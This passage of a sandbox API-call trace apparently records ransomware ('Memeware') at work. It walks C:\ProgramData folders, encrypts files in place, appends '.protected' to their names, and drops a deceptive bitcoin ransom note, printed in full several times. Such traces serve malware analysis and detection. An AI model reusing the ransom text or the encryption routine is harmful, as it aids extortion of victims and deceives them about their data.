pdwDataLen=0x295f3c4*=0x30) returned 1 [0072.894] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\nslist.hxl" (normalized: "c:\\programdata\\microsoft help\\nslist.hxl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0072.894] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\nslist.hxl") returned 44 [0072.894] StrStrW (lpFirst="nslist.hxl", lpSrch=".txt") returned 0x0 [0072.894] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\nslist.hxl") returned 44 [0072.894] StrStrW (lpFirst="nslist.hxl", lpSrch=".rar") returned 0x0 [0072.894] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\nslist.hxl") returned 44 [0072.894] StrStrW (lpFirst="nslist.hxl", lpSrch=".zip") returned 0x0 [0072.894] ReadFile (in: hFile=0xa4, lpBuffer=0x49d448, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesRead=0x295f3e4*=0x21dc, lpOverlapped=0x0) returned 1 [0072.908] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xffffde24, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.908] WriteFile (in: hFile=0xa4, lpBuffer=0x49d448*, nNumberOfBytesToWrite=0x21dc, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesWritten=0x295f3e4*=0x21dc, lpOverlapped=0x0) returned 1 [0072.909] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.909] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0072.909] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: 
lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0072.909] CloseHandle (hObject=0xa4) returned 1 [0072.909] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\nslist.hxl.protected") returned 54 [0072.909] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\nslist.hxl" (normalized: "c:\\programdata\\microsoft help\\nslist.hxl"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\nslist.hxl.protected" (normalized: "c:\\programdata\\microsoft help\\nslist.hxl.protected")) returned 1 [0072.910] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0 [0072.910] FindClose (in: hFindFile=0x494b80 | out: hFindFile=0x494b80) returned 1 [0072.910] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\RESTORE_FILES.txt") returned 51 [0072.910] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft help\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0072.910] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0072.910] WriteFile (in: hFile=0xac, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f3e4*=0x53d, lpOverlapped=0x0) returned 1 [0072.911] lstrlenA (lpString="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") returned 684 [0072.911] WriteFile (in: hFile=0xac, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f3e4*=0x2ac, lpOverlapped=0x0) returned 1 [0072.911] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0072.911] WriteFile (in: hFile=0xac, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f3e4*=0xb1, 
lpOverlapped=0x0) returned 1 [0072.911] CloseHandle (hObject=0xac) returned 1 [0072.911] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0072.911] lstrcmpiW (lpString1="Mozilla", lpString2="Windows") returned -1 [0072.911] lstrcmpiW (lpString1="Mozilla", lpString2="Program Files") returned -1 [0072.911] lstrcmpiW (lpString1="Mozilla", lpString2="Program Files (x86)") returned -1 [0072.911] lstrcmpiW (lpString1="Mozilla", lpString2="$Recycle.bin") returned 1 [0072.911] lstrcmpiW (lpString1="Mozilla", lpString2="System Volume Information") returned -1 [0072.911] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Mozilla") returned 26 [0072.911] lstrcmpW (lpString1="Mozilla", lpString2=".") returned 1 [0072.911] lstrcmpW (lpString1="Mozilla", lpString2="..") returned 1 [0072.911] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Mozilla\\*") returned 28 [0072.911] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Mozilla\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0x494b80 [0072.912] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0072.912] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0072.912] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0072.912] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0072.912] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0072.912] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Mozilla\\.") returned 28 [0072.912] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.912] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0072.912] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0072.912] lstrcmpiW 
(lpString1="..", lpString2="Program Files") returned -1 [0072.912] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0072.912] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0072.912] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0072.912] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Mozilla\\..") returned 29 [0072.912] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.912] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.912] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0072.912] lstrcmpiW (lpString1="logs", lpString2="Windows") returned -1 [0072.912] lstrcmpiW (lpString1="logs", lpString2="Program Files") returned -1 [0072.912] lstrcmpiW (lpString1="logs", lpString2="Program Files (x86)") returned -1 [0072.912] lstrcmpiW (lpString1="logs", lpString2="$Recycle.bin") returned 1 [0072.912] lstrcmpiW (lpString1="logs", lpString2="System Volume Information") returned -1 [0072.912] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Mozilla\\logs") returned 31 [0072.912] lstrcmpW (lpString1="logs", lpString2=".") returned 1 [0072.912] lstrcmpW (lpString1="logs", lpString2="..") returned 1 [0072.912] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Mozilla\\logs\\*") returned 33 [0072.912] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Mozilla\\logs\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x490a28 [0072.916] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0072.916] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0072.916] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0072.916] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0072.916] 
lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0072.916] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Mozilla\\logs\\.") returned 33 [0072.916] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.916] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0072.917] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0072.917] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0072.917] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0072.917] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0072.917] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0072.917] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Mozilla\\logs\\..") returned 34 [0072.917] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.917] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.917] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0072.917] lstrcmpiW (lpString1="maintenanceservice-install.log", lpString2="Windows") returned -1 [0072.917] lstrcmpiW (lpString1="maintenanceservice-install.log", lpString2="Program Files") returned -1 [0072.917] lstrcmpiW (lpString1="maintenanceservice-install.log", lpString2="Program Files (x86)") returned -1 [0072.917] lstrcmpiW (lpString1="maintenanceservice-install.log", lpString2="$Recycle.bin") returned 1 [0072.917] lstrcmpiW (lpString1="maintenanceservice-install.log", lpString2="System Volume Information") returned -1 [0072.917] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Mozilla\\logs\\maintenanceservice-install.log") returned 62 [0072.917] StrStrIW (lpFirst="maintenanceservice-install.log", lpSrch=".protected") returned 
0x0 [0072.917] lstrcmpW (lpString1="maintenanceservice-install.log", lpString2="RESTORE_FILES.txt") returned -1 [0072.917] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0072.917] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0072.917] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Mozilla\\logs\\maintenanceservice-install.log" (normalized: "c:\\programdata\\mozilla\\logs\\maintenanceservice-install.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0072.917] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Mozilla\\logs\\maintenanceservice-install.log") returned 62 [0072.917] StrStrW (lpFirst="maintenanceservice-install.log", lpSrch=".txt") returned 0x0 [0072.917] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Mozilla\\logs\\maintenanceservice-install.log") returned 62 [0072.917] StrStrW (lpFirst="maintenanceservice-install.log", lpSrch=".rar") returned 0x0 [0072.917] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Mozilla\\logs\\maintenanceservice-install.log") returned 62 [0072.917] StrStrW (lpFirst="maintenanceservice-install.log", lpSrch=".zip") returned 0x0 [0072.917] ReadFile (in: hFile=0xb4, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295f174*=0xa4, lpOverlapped=0x0) returned 1 [0072.918] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffff5c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.918] WriteFile (in: hFile=0xb4, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0xa4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295f174*=0xa4, 
lpOverlapped=0x0) returned 1 [0072.918] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.918] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0072.918] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0072.918] CloseHandle (hObject=0xb4) returned 1 [0072.919] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Mozilla\\logs\\maintenanceservice-install.log.protected") returned 72 [0072.919] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Mozilla\\logs\\maintenanceservice-install.log" (normalized: "c:\\programdata\\mozilla\\logs\\maintenanceservice-install.log"), lpNewFileName="\\\\?\\C:\\ProgramData\\Mozilla\\logs\\maintenanceservice-install.log.protected" (normalized: "c:\\programdata\\mozilla\\logs\\maintenanceservice-install.log.protected")) returned 1 [0072.919] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0072.919] FindClose (in: hFindFile=0x490a28 | out: hFindFile=0x490a28) returned 1 [0072.931] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Mozilla\\logs\\RESTORE_FILES.txt") returned 49 [0072.931] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Mozilla\\logs\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\mozilla\\logs\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0072.931] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0072.931] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0072.932] lstrlenA (lpString="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") returned 684 [0072.932] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0072.932] 
lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0072.932] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0072.932] CloseHandle (hObject=0xa4) returned 1 [0072.932] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0 [0072.933] FindClose (in: hFindFile=0x494b80 | out: hFindFile=0x494b80) returned 1 [0072.933] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Mozilla\\RESTORE_FILES.txt") returned 44 [0072.933] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Mozilla\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\mozilla\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0072.934] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0072.934] WriteFile (in: hFile=0xac, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f3e4*=0x53d, lpOverlapped=0x0) returned 1 [0072.934] lstrlenA (lpString="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") returned 684 [0072.934] WriteFile (in: hFile=0xac, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f3e4*=0x2ac, lpOverlapped=0x0) returned 1 [0072.935] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0072.935] WriteFile (in: hFile=0xac, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f3e4*=0xb1, 
lpOverlapped=0x0) returned 1 [0072.935] CloseHandle (hObject=0xac) returned 1 [0072.937] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0072.937] lstrcmpiW (lpString1="Oracle", lpString2="Windows") returned -1 [0072.937] lstrcmpiW (lpString1="Oracle", lpString2="Program Files") returned -1 [0072.937] lstrcmpiW (lpString1="Oracle", lpString2="Program Files (x86)") returned -1 [0072.937] lstrcmpiW (lpString1="Oracle", lpString2="$Recycle.bin") returned 1 [0072.937] lstrcmpiW (lpString1="Oracle", lpString2="System Volume Information") returned -1 [0072.937] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Oracle") returned 25 [0072.937] lstrcmpW (lpString1="Oracle", lpString2=".") returned 1 [0072.937] lstrcmpW (lpString1="Oracle", lpString2="..") returned 1 [0072.937] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Oracle\\*") returned 27 [0072.938] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Oracle\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0x494b80 [0072.938] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0072.938] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0072.938] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0072.938] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0072.938] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0072.938] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Oracle\\.") returned 27 [0072.938] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.938] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0072.938] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0072.938] lstrcmpiW (lpString1="..", 
lpString2="Program Files") returned -1 [0072.938] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0072.938] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0072.938] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0072.938] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Oracle\\..") returned 28 [0072.938] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.938] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.938] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0 [0072.938] FindClose (in: hFindFile=0x494b80 | out: hFindFile=0x494b80) returned 1 [0072.938] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Oracle\\RESTORE_FILES.txt") returned 43 [0072.938] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Oracle\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\oracle\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0072.939] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0072.939] WriteFile (in: hFile=0xac, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f3e4*=0x53d, lpOverlapped=0x0) returned 1 [0072.939] lstrlenA (lpString="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") returned 684 [0072.939] WriteFile (in: hFile=0xac, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f3e4*=0x2ac, lpOverlapped=0x0) returned 1 [0072.939] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0072.939] WriteFile (in: hFile=0xac, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f3e4*=0xb1, 
lpOverlapped=0x0) returned 1 [0072.939] CloseHandle (hObject=0xac) returned 1 [0072.939] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0072.940] lstrcmpiW (lpString1="Package Cache", lpString2="Windows") returned -1 [0072.940] lstrcmpiW (lpString1="Package Cache", lpString2="Program Files") returned -1 [0072.940] lstrcmpiW (lpString1="Package Cache", lpString2="Program Files (x86)") returned -1 [0072.940] lstrcmpiW (lpString1="Package Cache", lpString2="$Recycle.bin") returned 1 [0072.940] lstrcmpiW (lpString1="Package Cache", lpString2="System Volume Information") returned -1 [0072.940] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache") returned 32 [0072.940] lstrcmpW (lpString1="Package Cache", lpString2=".") returned 1 [0072.940] lstrcmpW (lpString1="Package Cache", lpString2="..") returned 1 [0072.940] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\*" | out: 